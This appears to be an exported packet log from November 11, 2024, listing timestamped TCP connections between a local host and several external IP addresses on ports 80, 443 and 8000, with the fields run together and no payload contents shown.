                                                                                                                                                                                                          Nov 11, 2024 18:24:05.901858091 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.902012110 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.907031059 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.083930016 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.084022999 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374000072 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374030113 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374428034 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.374552011 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.455931902 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503335953 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503927946 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503948927 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503962040 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503968000 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.503972054 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504059076 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504085064 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504096985 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504236937 CET8049707154.212.231.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.504286051 CET4970780192.168.2.8154.212.231.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.683527946 CET4971980192.168.2.885.17.31.82
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.688405991 CET804971985.17.31.82192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743554115 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743602037 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743674994 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.743995905 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744010925 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744174004 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744297028 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744410038 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744440079 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744462967 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744473934 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744496107 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.744508982 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.745147943 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.745194912 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826549053 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826597929 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826626062 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826646090 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826661110 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.826684952 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827601910 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827666998 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827675104 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827733040 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827752113 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827794075 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827800989 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.827873945 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.828536034 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.828587055 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906563044 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906618118 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906653881 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906671047 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906708956 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.906747103 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907174110 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907206059 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907233000 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907242060 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907263041 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907279968 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907284975 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907305002 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907320976 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.907344103 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.908801079 CET49718443192.168.2.875.2.71.199
                                                                                                                                                                                                          Nov 11, 2024 18:24:06.908818007 CET4434971875.2.71.199192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.209656954 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.209744930 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216227055 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216236115 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216604948 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.216660976 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.217133045 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.259341955 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324378967 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324407101 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324421883 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324434996 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324444056 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324445963 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324475050 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324517965 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324537992 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324565887 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324584007 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324604988 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324613094 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324625015 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324645042 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324661970 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324770927 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.324811935 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.329663992 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.329725027 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.330957890 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.331001043 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.366347075 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.366403103 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.366481066 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.366524935 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405745029 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405761957 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405775070 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405795097 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405807972 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405831099 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405862093 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405939102 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405951023 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405970097 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405977011 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.405997038 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406018019 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406414986 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406430006 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406441927 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406466007 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406488895 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406836033 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406882048 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406883955 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.406925917 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407078028 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407121897 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407268047 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407279968 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407289982 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407309055 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407340050 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407701969 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407713890 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407726049 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407737970 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407749891 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407764912 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.407798052 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.408267975 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.408279896 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.408292055 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.408309937 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.408329964 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.447390079 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.447405100 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.447468042 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487086058 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487149000 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487189054 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487201929 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487240076 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487252951 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487448931 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487468004 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487504959 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487504959 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487600088 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487612009 CET8049706199.191.50.83192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487642050 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.487658024 CET4970680192.168.2.8199.191.50.83
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933048010 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933099985 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933114052 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933149099 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933171034 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933201075 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933207989 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933226109 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933248043 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933281898 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933320045 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933353901 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933362007 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933404922 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933412075 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933455944 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933693886 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933737993 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933747053 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.933790922 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.934680939 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.934729099 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.934736013 CET44349720188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.934788942 CET49720443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.972210884 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:07.977004051 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.341226101 CET8049709188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.341643095 CET4970980192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.347846031 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.347893000 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.347991943 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.348319054 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.348335028 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.777343035 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.777445078 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.779994965 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.780004978 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.780244112 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.780344009 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.780772924 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:08.823344946 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.021820068 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.021883965 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.021904945 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.021958113 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022016048 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022058964 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022063971 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022115946 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022121906 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022160053 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022165060 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022212982 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022218943 CET44349721188.114.96.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022263050 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022450924 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.022481918 CET49721443192.168.2.8188.114.96.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.104038954 CET4972280192.168.2.813.248.169.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.109492064 CET804972213.248.169.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.109559059 CET4972280192.168.2.813.248.169.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.113722086 CET4972280192.168.2.813.248.169.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.119481087 CET804972213.248.169.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.277457952 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.282263041 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.282322884 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.282461882 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.287475109 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.446103096 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.450997114 CET804972418.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.451061010 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.451445103 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.453214884 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.456250906 CET804972418.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.458089113 CET80497253.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.458153009 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.458292007 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.463303089 CET80497253.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.543486118 CET804972213.248.169.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.543538094 CET4972280192.168.2.813.248.169.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.615447044 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.620295048 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.620368004 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.620506048 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.625317097 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.877619028 CET804972418.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.877685070 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.879936934 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.883804083 CET804972418.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.883881092 CET4972480192.168.2.818.208.156.248
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.884722948 CET804972418.208.156.248192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.885205984 CET80497253.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.885258913 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.887192965 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.891825914 CET80497253.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.891870022 CET4972580192.168.2.83.94.10.34
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.891948938 CET80497253.94.10.34192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.027908087 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.029441118 CET8049723188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.029522896 CET4972380192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.047262907 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.047295094 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.047378063 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.047678947 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.047693014 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.402950048 CET8049726103.150.10.48192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.403094053 CET4972680192.168.2.8103.150.10.48
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.407242060 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.412080050 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.412297010 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.412297964 CET497288000192.168.2.8106.15.232.163
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.417094946 CET800049728106.15.232.163192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.497486115 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.497773886 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.502671003 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.502686977 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.503024101 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.503319025 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.503547907 CET49727443192.168.2.8188.114.97.3
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.551332951 CET44349727188.114.97.3192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.187829971 CET800049728106.15.232.163192.168.2.8
